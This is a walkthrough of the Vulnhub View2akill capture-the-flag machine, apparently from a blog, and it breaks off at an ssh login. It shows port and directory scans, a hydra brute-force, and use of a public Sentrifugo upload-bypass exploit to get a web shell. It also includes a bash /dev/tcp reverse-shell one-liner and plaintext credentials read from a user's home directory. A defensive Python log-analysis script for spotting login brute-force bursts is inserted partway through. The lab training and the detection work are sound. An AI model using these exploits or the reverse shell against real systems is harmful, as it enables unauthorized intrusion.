Vulnhub View2akill Target Machine Testing Process (Partial)

View2akill

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:8a:ef:1d      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.206  08:00:27:bb:ed:83      1      60  PCS Systemtechnik GmbH                                                   



Using the netdiscover tool in Kali Linux, the target host IP address was identified as 192.168.56.206.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.206 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-02 21:51 EST
Nmap scan report for bogon (192.168.56.206)
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 54:8e:3a:14:b2:be:03:5c:d4:08:3a:ed:bb:e1:55:53 (RSA)
|   256 aa:be:cb:e1:b6:7f:47:75:29:f7:63:e5:f9:39:78:2e (ECDSA)
|_  256 de:1c:31:e0:15:4d:f5:dc:8e:bc:3c:e4:7d:64:75:54 (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: rain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=rain
| Subject Alternative Name: DNS:rain
| Not valid before: 2019-07-22T22:11:20
|_Not valid after:  2029-07-19T22:11:20
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
|_/joomla /zorin /dev /defense
|_http-title: A View To A Kill
|_http-server-header: Apache/2.4.29 (Ubuntu)
8191/tcp open  http    PHP cli server 5.5 or later
|_http-title: electronic controller app
MAC Address: 08:00:27:BB:ED:83 (Oracle VirtualBox virtual NIC)
Service Info: Host:  rain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.54 seconds

The NMAP scan results show that the target host has 4 open ports: 22 (ssh), 25 (smtp), 80 (http) and 8191 (http).

Getting a shell

Port 8191

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ nikto -h http://192.168.56.206:8191
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.206
+ Target Hostname:    192.168.56.206
+ Target Port:        8191
+ Start Time:         2023-03-02 21:54:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-03-02 21:54:52 (GMT-5) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                   
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206:8191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh --exclude-length 167
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.206:8191
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          167
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/03/02 21:57:00 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1102195 / 1102805 (99.94%)
===============================================================
2023/03/02 22:10:23 Finished
===============================================================

Information gathering against port 8191 yielded nothing of value.

Port 80

Visiting port 80, the source code of the returned page reveals a /pics directory. Visiting that directory shows many image files:

[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[IMG]	aview.gif	2019-10-19 15:06 	6.6M	 
[SND]	theme.mp3	2019-10-19 23:32 	5.7M	 
[IMG]	view1.jpg	2019-10-19 15:06 	52K	 
[IMG]	view2.png	2019-10-19 15:06 	549K	 
[IMG]	view3.gif	2019-10-19 15:06 	964K	 
[IMG]	view4.gif	2019-10-19 15:06 	7.3M	 
[IMG]	view5.gif	2019-10-19 15:06 	1.0M	 
[IMG]	view6.gif	2019-10-19 15:06 	25M	 
[IMG]	view7.gif	2019-10-19 15:06 	8.3M	 
[IMG]	view8.png	2019-10-19 15:55 	141K	 
[IMG]	view10.gif	2019-10-19 15:55 	4.6M	 
[IMG]	view11.gif	2019-10-19 15:55 	7.3M	 
[IMG]	view12.gif	2019-10-19 15:55 	2.6M	 
[IMG]	view13.gif	2019-10-19 15:55 	16M	 
[IMG]	view14.gif	2019-10-19 15:55 	7.3M	 
[IMG]	view15.gif	2019-10-19 15:55 	20M	 
[VID]	view15.webm	2019-10-19 23:40 	4.7M	 
[ ]	view20.webp	2019-10-26 12:23 	1.6M	 
[ ]	view21.webp	2019-10-26 12:23 	1.5M	 
[IMG]	view22.png	2019-10-19 15:06 	549K	 
[IMG]	viewBack.png	2019-10-19 23:30 	142K	 
[IMG]	viewCover.png	2019-10-19 23:26 	1.2M	 
[IMG]	viewa.png	2019-10-21 00:25 	278K	 
[IMG]	zorin.png	2019-10-19 23:26 	140K	 
[IMG]	zorin_max.png	2019-10-19 23:26 	129K	 

Is zorin max a username?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ curl http://192.168.56.206/robots.txt
User-agent: *
Disallow: /joomla
Disallow: /zorin
Disallow: /dev
Disallow: /defense

Visiting the /joomla directory: no useful information.

Visiting the /zorin directory: no useful information.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ mv ~/Downloads/e_bkup.tar.gz . 
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ls     
e_bkup.tar.gz  nmap_full_scan
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ tar -zxvf e_bkup.tar.gz          
New_Employee_Onboarding_Chuck.rtf
onboarding_email_template.rtf
Stop_Storing_Passwords.rtf
note_to_mail_admins.txt
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ls -alh
total 32K
drwxr-xr-x  2 kali kali 4.0K Mar  2 22:22 .
drwxr-xr-x 65 kali kali 4.0K Mar  2 21:49 ..
-rw-r--r--  1 kali kali 1.2K Mar  2 22:21 e_bkup.tar.gz
-rw-r--r--  1 kali kali  795 Oct 20  2019 New_Employee_Onboarding_Chuck.rtf
-rw-r--r--  1 root root 1.5K Mar  2 21:51 nmap_full_scan
-rw-r--r--  1 kali kali  165 Oct 20  2019 note_to_mail_admins.txt
-rw-r--r--  1 kali kali  302 Oct 20  2019 onboarding_email_template.rtf
-rw-r--r--  1 kali kali  467 Oct 20  2019 Stop_Storing_Passwords.rtf
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat note_to_mail_admins.txt          
Yo, wassup computer geeks! I was told by design to upload a few example emails for you nerds to work with in prep for what they called "email web gooey platform".  
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat Stop_Storing_Passwords.rtf 
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard All, I know you're close with Max, but you can't keep storing your credentials in txt files on your desktop! We already have had complaints of the apps inactivity auto logout feature, but 5 seconds is high enough in my professional opinion. Simply copy pasting credentials in the login fields is bad practice, even if password requirments are set to 32 characters minimun! 

- Scarpine - Head of Security - CSO CIO}
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat onboarding_email_template.rtf 
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting EMPLOYEE, We welcome you to the team! Please login to our HR mgmt portaland fill out your profile and Details. Login username: USERNAME@localhost.com and password is: PASSWORD. INSERT ORG SPECIFIC PHRASE, glad you joined the team EMPLOYEE! }
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat New_Employee_Onboarding_Chuck.rtf 
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee! }
                                                   

This appears to be a username and password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.206
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2023/03/02 22:26:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 194]
/.html                (Status: 403) [Size: 279]
/pics                 (Status: 301) [Size: 315] [--> http://192.168.56.206/pics/]
/dev                  (Status: 301) [Size: 314] [--> http://192.168.56.206/dev/]
/robots.txt           (Status: 200) [Size: 83]
/defense              (Status: 301) [Size: 318] [--> http://192.168.56.206/defense/]
/joomla               (Status: 301) [Size: 317] [--> http://192.168.56.206/joomla/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101683 / 1102805 (99.90%)
===============================================================
2023/03/02 22:30:58 Finished

Using the ZAP tool, the following URL was discovered:

http://192.168.56.206/sentrifugo

Visiting this directory shows a user login page. This looks like the entry point, so the directory is scanned further:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ gobuster dir -u http://192.168.56.206/sentrifugo/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.206/sentrifugo/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/03/02 22:46:35 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 20556]
/data                 (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/data/]
/public               (Status: 301) [Size: 328] [--> http://192.168.56.206/sentrifugo/public/]
/patches              (Status: 301) [Size: 329] [--> http://192.168.56.206/sentrifugo/patches/]
/upgrade.php          (Status: 302) [Size: 1689] [--> index.php]
/success.php          (Status: 302) [Size: 3] [--> index.php]
/application          (Status: 301) [Size: 333] [--> http://192.168.56.206/sentrifugo/application/]
/logs                 (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/logs/]
/error.php            (Status: 302) [Size: 0] [--> index.php]
/sql                  (Status: 301) [Size: 325] [--> http://192.168.56.206/sentrifugo/sql/]
/LICENSE.txt          (Status: 200) [Size: 35126]
/CHANGELOG.txt        (Status: 200) [Size: 1400]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/Zend                 (Status: 301) [Size: 326] [--> http://192.168.56.206/sentrifugo/Zend/]
/UPGRADE.txt          (Status: 200) [Size: 1753]
/Classes              (Status: 301) [Size: 329] [--> http://192.168.56.206/sentrifugo/Classes/]
Progress: 1102611 / 1102805 (99.98%)
===============================================================


                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ curl http://192.168.56.206/sentrifugo/CHANGELOG.txt
CHANGELOG Sentrifugo
====================
RELEASE 3.2 
------------

Changes in Controllers
------------------------
./application/modules/exit/controllers/ExittypesController.php 
./application/modules/exit/controllers/ConfigureexitqsController.php 
./application/modules/exit/controllers/ExitprocsettingsController.php 
./application/modules/exit/controllers/AllexitprocController.php 
./application/modules/exit/controllers/ExitprocController.php 
./application/modules/default/controllers/EmployeeController.php 
./application/modules/default/controllers/LeavemanagementController.php 
./application/modules/default/controllers/holidaydatesController.php 



- ExittypesController.php
  Management,hr can add,edit,delete exit types.

- ConfigureexitqsController.php 
  Management,hr can add,edit,delete questions for exit types.
  
- ExitprocsettingsController.php 
  Management,hr can configure managers for exit process.
  
- AllexitprocController.php
  Configured managers can approve or reject exit process.
  
- ExitprocController.php
  Employee can initiate exit process.He can check status of exit process.

  
  
Note: You can find the respective view files in below scripts: 
./application/modules/exit/views/scripts

Changes in scripts
------------------------
./public/media/exit/js/expenses.js
./public/media/js/hrms.js
./public/media/css/style.css
./public/media/css/successstyle.css  

This shows that the CMS version is 3.2.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ searchsploit  Sentrifugo
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)                             | php/webapps/48997.py
Sentrifugo 3.2 - File Upload Restriction Bypass                                             | php/webapps/47323.txt
Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)                             | php/webapps/48955.py
Sentrifugo 3.2 - Persistent Cross-Site Scripting                                            | php/webapps/47324.txt
Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting                                        | php/webapps/48446.txt
Sentrifugo HRMS 3.2 - 'deptid' SQL Injection                                                | windows/webapps/45266.txt
Sentrifugo HRMS 3.2 - 'id' SQL Injection                                                    | php/webapps/48179.txt
Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)              | php/webapps/48998.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                       

But most of these vulnerabilities require authentication before they can be used.

Login bypass statements were tried, but all of them failed.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ cat New_Employee_Onboarding_Chuck.rtf 
{\rtf1\ansi{\fonttbl\f0\fswiss Helvetica;}\f0\pard Greeting Chuck, We welcome you to the team! Please login to our HR mgmt portal(which we spoke of) and fill out your profile and Details. Make sure to enter in the descrption of your CISSP under Training & Certificate Details since you mentioned you have it. I will be checking that section often as I need to fill out related paperwork. Login username: chuck@localhost.com and password is the lowercase word/txt from the cool R&D video I showed you with the remote detonator + the transmit frequency of an HID proxcard reader - so password format example: facility007. Sorry for the rigmarole, the Security folks will kill me if I send passwords in clear text. We make some really neat tech here at Zorin, glad you joined the team Chuck Lee! }

The email is known: chuck@localhost.com

According to the hint, the password is the text in this image:

http://192.168.56.206/dev/remote_control.gif

Password: HELICOPTER, but uppercase seems wrong; it should be lowercase.

It seems the hint is wrong, so the password needs to be brute-forced.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ hydra -l chuck@localhost.com -P /usr/share/wordlists/rockyou.txt 192.168.56.206 http-post-form "/sentrifugo/index.php/:username=^USER^&password=^PASS^:F=incorrect" -v 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-03 00:10:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.206:80/sentrifugo/index.php/:username=^USER^&password=^PASS^:F=incorrect
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: 12345
[STATUS] attack finished for 192.168.56.206 (waiting for children to complete tests)
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: password
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: iloveyou
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: 12345678
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: princess
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: rockyou
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: 123456789
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: 123456
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: nicole
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: 1234567
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: monkey
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: abc123
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: jessica
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: babygirl
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: lovely
[80][http-post-form] host: 192.168.56.206   login: chuck@localhost.com   password: daniel
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-03 00:10:28

Unexpectedly, a great many passwords were "cracked", so something is probably wrong with this approach.
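From the defender's side, a run like the one above leaves a distinctive trace in the web server's access log. The following is an added example, not part of the original post or of Sentrifugo, that flags such a burst over constructed Apache log lines; the login path comes from the hydra command above, while THRESHOLD, WINDOW, the sample lines and the User-Agent strings in them are assumptions.

```python
"""Flag a login brute-force burst in Apache access logs.

Added example for this walkthrough, not part of the original post or of
Sentrifugo. It parses Apache combined-format lines (constructed sample below)
and reports every client that POSTs to the Sentrifugo login endpoint more
than THRESHOLD times inside a WINDOW-second sliding window, the footprint
the hydra run above leaves: 16 POSTs in about three seconds from one IP.
The per-IP status histogram shows whether any attempt actually succeeded
(a 302 redirect after a run of 200s) instead of trusting a tool's
"valid password" verdict, which above was wrong 16 times over.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

LOGIN_PATH = "/sentrifugo/index.php"  # endpoint the hydra command targeted
THRESHOLD = 10                         # assumed: more POSTs than this ...
WINDOW = 60                            # ... within this many seconds is a burst

# Apache "combined" format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").rstrip("/"),  # hydra used a trailing slash
        "status": int(m.group("status")),
    }


def login_bursts(lines, threshold=THRESHOLD, window=WINDOW):
    """Map ip -> {"burst": n, "statuses": {code: count}} for each client whose
    densest `window`-second run of login POSTs exceeds `threshold`."""
    stamps = defaultdict(list)
    statuses = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            stamps[rec["ip"]].append(rec["ts"])
            statuses[rec["ip"]][rec["status"]] += 1
    hits = {}
    for ip, times in stamps.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted times
            while (t - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            hits[ip] = {"burst": best, "statuses": dict(statuses[ip])}
    return hits


# Constructed sample log (not captured from the target): one ordinary visitor
# and the brute-force burst, 16 login POSTs spread over three seconds, all
# answered with 200 (the login form again), i.e. none of them logged in.
SAMPLE_LOG = (
    ['192.168.56.1 - - [03/Mar/2023:00:10:20 -0500] '
     '"GET /sentrifugo/index.php HTTP/1.1" 200 20556 "-" "Mozilla/5.0"']
    + ['192.168.56.146 - - [03/Mar/2023:00:10:%02d -0500] '
       '"POST /sentrifugo/index.php/ HTTP/1.1" 200 20556 "-" "Mozilla/5.0 (Hydra)"'
       % (25 + i // 6) for i in range(16)]
    + ['192.168.56.1 - - [03/Mar/2023:00:10:40 -0500] '
       '"POST /sentrifugo/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"']
)

if __name__ == "__main__":
    for ip, info in login_bursts(SAMPLE_LOG).items():
        print("%s: %d login POSTs within %ds, statuses %s"
              % (ip, info["burst"], WINDOW, info["statuses"]))
```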

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ nikto -h http://192.168.56.206/sentrifugo/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.206
+ Target Hostname:    192.168.56.206
+ Target Port:        80
+ Start Time:         2023-03-03 00:11:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /sentrifugo/data/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/data/: This might be interesting...
+ OSVDB-3268: /sentrifugo/logs/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/logs/: This might be interesting...
+ OSVDB-3268: /sentrifugo/public/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/public/: This might be interesting...
+ OSVDB-3268: /sentrifugo/sql/: Directory indexing found.
+ OSVDB-3092: /sentrifugo/UPGRADE.txt: Default file found.
+ OSVDB-3092: /sentrifugo/LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /sentrifugo/CHANGELOG.txt: A changelog was found.
+ OSVDB-3092: /sentrifugo/.git/index: Git Index file may contain directory listing information.
+ /sentrifugo/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /sentrifugo/.git/config: Git config file found. Infos about repo details may be present.
+ /sentrifugo/CHANGELOG.txt: Version number implies that there is a SQL Injection in Drupal 7, can be used for authentication bypass (Drupageddon: see https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html).


A /.git directory was found.

┌──(kali㉿kali)-[~/Desktop/Toolsets/GitHack-master]
└─$ python2 GitHack.py http://192.168.56.206/sentrifugo/.git/

GitHack found nothing.

Back to the email and password obtained earlier; only the password is wrong:

The file earlier hinted at "the transmit frequency of an HID proxcard reader", so the clue (hint) is transmit frequency and HID. Combined with the files in the /dev directory, this points to HID6005.pdf. Opening that file (only two pages) and searching for the keyword transmit frequency shows 125 kHz.

So the password should be the combination HELICOPTER125 kHz; following "lowercase word/txt" and "password format example: facility007", the final password is: helicopter125

Login succeeded. Combining this with the exploitdb vulnerability information:

┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ searchsploit -m php/webapps/48955.py 
  Exploit: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
      URL: https://www.exploit-db.com/exploits/48955
     Path: /usr/share/exploitdb/exploits/php/webapps/48955.py
File Type: Python script, ASCII text executable

Copied to: /home/kali/Desktop/Toolsets/GitHack-master/dist/192.168.56.206/.git/48955.py


                                                                                                                              
┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ mv 48955.py exploit.py

┌──(kali㉿kali)-[~/…/GitHack-master/dist/192.168.56.206/.git]
└─$ python exploit.py --target http://192.168.56.206/sentrifugo --user chuck@localhost.com --password helicopter125
[~] Logging in
[+] Logged in
[~] Exploiting
[!] Spawning shell
www-data@view$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@view$ ls -alh
total 16K
drwxrwxr-x  2 www-data www-data 4.0K Mar  3 13:08 .
drwxrwxr-x 17 www-data www-data 4.0K Jul 26  2019 ..
-rw-r--r--  1 www-data www-data   31 Mar  3 13:08 1677848909_3_shell.php
-rwxrwxr-x  1 www-data www-data  100 Jul 26  2019 info.TXT
www-data@view$ cat info.TXT
Folder accepts only pdf,docs and images(png,jpeg,gif) 
Upload File Size depends on PHP configurtion.
www-data@view$ pwd
/var/www/html/sentrifugo/public/uploads/policy_doc_temp
www-data@view$ cd /home

www-data@view$ ls -alh
total 16K
drwxrwxr-x  2 www-data www-data 4.0K Mar  3 13:08 .
drwxrwxr-x 17 www-data www-data 4.0K Jul 26  2019 ..
-rw-r--r--  1 www-data www-data   31 Mar  3 13:08 1677848909_3_shell.php
-rwxrwxr-x  1 www-data www-data  100 Jul 26  2019 info.TXT
www-data@view$ cd /tmp

www-data@view$ ls
1677848909_3_shell.php
info.TXT
www-data@view$ cd ..

www-data@view$ ls
1677848909_3_shell.php
info.TXT
www-data@view$ 

This shell seems to have a problem: it cannot change directory, so another shell needs to be spawned:

www-data@view$ bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ sudo nc -nlvp 5555                                                                               
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.206] 43136
bash: cannot set terminal process group (1808): Inappropriate ioctl for device
bash: no job control in this shell
www-data@view:/var/www/html/sentrifugo/public/uploads/policy_doc_temp$ cd /tmp
</sentrifugo/public/uploads/policy_doc_temp$ cd /tmp                   
www-data@view:/tmp$ ls -alh
ls -alh
total 8.0K
drwxrwxrwt  2 root root 4.0K Mar  3 13:08 .
drwxr-xr-x 23 root root 4.0K Oct 25  2019 ..
www-data@view:/tmp$ 

This gives a more normal shell.

www-data@view:/home/jenny$ unzip dsktp_backup.zip
unzip dsktp_backup.zip
Archive:  dsktp_backup.zip
  inflating: passswords.txt          
  inflating: todo.txt                
www-data@view:/home/jenny$ ls -alh
ls -alh
total 32K
drwxrwxrwx 2 jenny    jenny    4.0K Mar  3 13:16 .
drwxr-xr-x 6 root     root     4.0K Oct 27  2019 ..
-rw-r--r-- 1 jenny    jenny     220 Oct 20  2019 .bash_logout
-rw-r--r-- 1 jenny    jenny    3.7K Oct 20  2019 .bashrc
-rw-r--r-- 1 jenny    jenny     807 Oct 20  2019 .profile
-rw-r--r-- 1 jenny    jenny     845 Oct 25  2019 dsktp_backup.zip
-rwxrwxr-x 1 www-data www-data  104 Oct 20  2019 passswords.txt
-rwxrwxr-x 1 www-data www-data  669 Oct 25  2019 todo.txt
www-data@view:/home/jenny$ cat todo.txt
cat todo.txt
TODO

-Give feedback to marketing on logo (it currently looks like the banner ouside a cheap Italian reseaurant!!)
        -The Boss likes the original, so I guess we're keeping it :/
-Push final script to /home/max/aView.py
        -Waiting on devs and mechanical eng. to finalize programs (no way for QA to test this one! Yikes!)
-Verify James Bond is MI6. They may be on to us.
        -Security says they are trying to infltrate our servers, so they pushed out a new password policy. 
        -Head of Security said this policy will solve all security related problems after I confronted him about it.
-Make a habit of deleting pointless emails.
-Migrate needed desktop items to Linux server.
www-data@view:/home/jenny$ cat passwords.txt
cat passwords.txt
cat: passwords.txt: No such file or directory
www-data@view:/home/jenny$ cat passswords.txt
cat passswords.txt
hr mgmt - NO ACCESS ANYMORE
jenny@localhost.com
ThisisAreallYLONGPAssw0rdWHY!!!!

ssh
jenny
!!!sfbay!!!
www-data@view:/home/jenny$ 

This should be jenny's password; check whether it works over ssh.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]
└─$ ssh jenny@192.168.56.206                  
The authenticity of host '192.168.56.206 (192.168.56.206)' can't be established.
ED25519 key fingerprint is SHA256:CeTXnkKiW73Oabh7afa/MIQc1vTuHjfy8M1/SXZS5Rk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.206' (ED25519) to the list of known hosts.
jenny@192.168.56.206's password: 
